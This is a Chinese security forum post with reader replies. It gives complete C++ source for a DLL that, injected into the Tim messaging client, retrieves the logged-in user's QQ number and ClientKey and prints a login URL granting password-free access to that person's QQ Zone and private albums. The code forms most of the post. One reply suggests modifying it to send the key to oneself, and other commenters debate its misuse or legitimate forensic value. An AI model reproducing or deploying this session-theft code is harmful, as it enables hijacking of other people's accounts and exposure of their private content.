首页
论坛
课程
招聘
[原创] 窃取Tim ClientKey,无密进入QQ空间
2019-12-31 20:04 8173

[原创] 窃取Tim ClientKey,无密进入QQ空间

2019-12-31 20:04
8173
之前浏览到论坛上有个帖子,用易语言实现的,我照着思路实现了一个C++版本

编译好DLL,直接注入Tim.exe,使用dbgView等工具查看输出的url,复制到任何一台电脑,使用浏览器打开这个url,就可以不需要密码进入某人的空间,查看加密相册等~

效果:


复制URL到虚拟机里,直接打开,是已登录状态



DLL源码:
// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include <stdio.h>
#include <WTypes.h>

//定义CTXStringW为BSTR
typedef BSTR CTXStringW;

CTXStringW AllocTXString(const wchar_t* lpSrc)
{
    if (lpSrc == NULL) return NULL;
    BYTE* bBuffer = new BYTE[16 + (wcslen(lpSrc) + 1) * 2];
    if (bBuffer == NULL) return NULL;
    DWORD dwZero = 0;
    DWORD dwCount = 3;
    DWORD dwLenth = wcslen(lpSrc) + 1;
    memmove(bBuffer + 0 * 4, &dwZero, 4);
    memmove(bBuffer + 1 * 4, &dwCount, 4);
    memmove(bBuffer + 2 * 4, &dwLenth, 4);
    memmove(bBuffer + 3 * 4, &dwLenth, 4);
    wcscpy((wchar_t*)(bBuffer + 4 * 4), lpSrc);
    return CTXStringW(bBuffer + 16);
}

VOID Steal()
{
    do {

        HMODULE hKernelUtil = GetModuleHandle(L"KernelUtil.dll");
        if (hKernelUtil == NULL)
        {
            OutputDebugStringA("Get KernelUtil Module failed \n");
            break;
        }

        PVOID PtrGetSelfUin = GetProcAddress(hKernelUtil, "?GetSelfUin@Contact@Util@@YAKXZ");
        if (PtrGetSelfUin == NULL)
        {
            OutputDebugStringA("Get GetSelfUin Function failed \n");
            break;
        }

        DWORD uin = ((int(*)(int))PtrGetSelfUin)(1);
        if (uin == NULL)
        {
            OutputDebugStringA("Invoke GetSelfUin Function failed \n");
            break;
        }

        // Print QQ number
        char szUin[MAX_PATH] = { 0 };
        sprintf(szUin, "%d", uin);

        PVOID GetSignature = GetProcAddress(hKernelUtil, "?GetSignature@Misc@Util@@YA?AVCTXStringW@@PBD@Z");
        if (GetSignature == NULL)
        {
            OutputDebugStringA("Get GetSignature Function failed \n");
            break;
        }

        WCHAR wsBuffer[MAX_PATH] = { 0 };
        CTXStringW ClientKey = AllocTXString(wsBuffer);
        PVOID res = ((PVOID(*)(PVOID,const char*))GetSignature)(&ClientKey,"buf32ByteValueAddedSignature");
        if (res == NULL)
        {
            OutputDebugStringA("Invoke GetSignature Function failed \n");
            break;
        }

        // 复制下面链接,无需密码,进入QQ空间
        char msg[MAX_PATH] = { 0 };
        sprintf(msg, "https://ssl.ptlogin2.qq.com/jump?ptlang=2052&clientuin=%s&clientkey=%ws&u1=https://user.qzone.qq.com/%s%/infocenter&source=panelstar\n",szUin,ClientKey,szUin);
        OutputDebugStringA(msg);

    } while (0);
   


}

BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        Steal();
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}




看雪论坛2020激励机制:能力值、活跃值和雪币体系!会员积分、权限和会员发帖、回帖活跃程度关联!

收藏
点赞0
打赏
分享
最新回复 (11)
雪    币: 1004
活跃值: 活跃值 (10)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
byClark 活跃值 2019-12-31 20:28
2
0
楼主牛逼,吓我一跳,我以为可以随便进入所有人的空间了呢,还是得注入登陆状态的tim程序才可以,以为终于可以完成少年时候盗号随便进空间的梦想了呢
雪    币: 281
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
画骨 活跃值 2020-1-9 19:11
3
0
楼主,免密登录必须在QQ PC客户端已经登录的情况下么?有绕过的办法么?
雪    币: 3550
活跃值: 活跃值 (105)
能力值: ( LV6,RANK:93 )
在线值:
发帖
回帖
粉丝
Adventure 活跃值 2020-1-9 21:43
4
0
本来就是需要在已经登陆的情况下才能用。 至于应用场景嘛,肯定是后渗透、取证等方面
雪    币: 718
活跃值: 活跃值 (81)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
Oday小斯 活跃值 2020-1-10 00:08
5
0
画骨 楼主,免密登录必须在QQ PC客户端已经登录的情况下么?有绕过的办法么?
在登陆状态下才能拿到clientkey
雪    币: 668
活跃值: 活跃值 (27)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
爆破鬼才 活跃值 2020-2-13 10:57
6
0

最后于 2020-2-27 15:49 被爆破鬼才编辑 ,原因:
雪    币: 55
活跃值: 活跃值 (34)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
feidan 活跃值 2020-2-14 10:55
7
0
爆破鬼才 这有啥用吗?“编译好DLL,直接注入Tim.exe,使用dbgView等工具查看输出的url”,你都能打开dbgview查看输出的url了为啥不直接打开他的QQ空间呢
如果在这基础上改成把clientkey传给自己呢 你说什么用 作者这里只是提供了一个办法 剩下的怎么还得分人
雪    币: 927
活跃值: 活跃值 (13)
能力值: ( LV2,RANK:15 )
在线值:
发帖
回帖
粉丝
lynxtang 活跃值 2020-2-14 21:45
8
0
就当作是练习C++编程吧
雪    币:
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
Finger _241789 活跃值 2020-2-29 23:23
9
0
感觉不适合公开吧,短期内会被各类恶意软件利用
雪    币:
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
Finger _241789 活跃值 2020-2-29 23:24
10
0
已经被人转载到微信和freebuf上了,某盒子也蠢蠢欲动
雪    币: 3937
活跃值: 活跃值 (97)
能力值: ( LV3,RANK:25 )
在线值:
发帖
回帖
粉丝
alphc 活跃值 2020-3-10 18:25
11
0
Finger _241789 感觉不适合公开吧,短期内会被各类恶意软件利用
没你想的那么严重,https://bbs.pediy.com/thread-178807.htm,论坛上13年就有人讨论这个了
雪    币: 20
能力值: ( LV1,RANK:0 )
在线值:
发帖
回帖
粉丝
simcmcc 活跃值 2020-7-31 20:54
12
0
游客
登录 | 注册 方可回帖
返回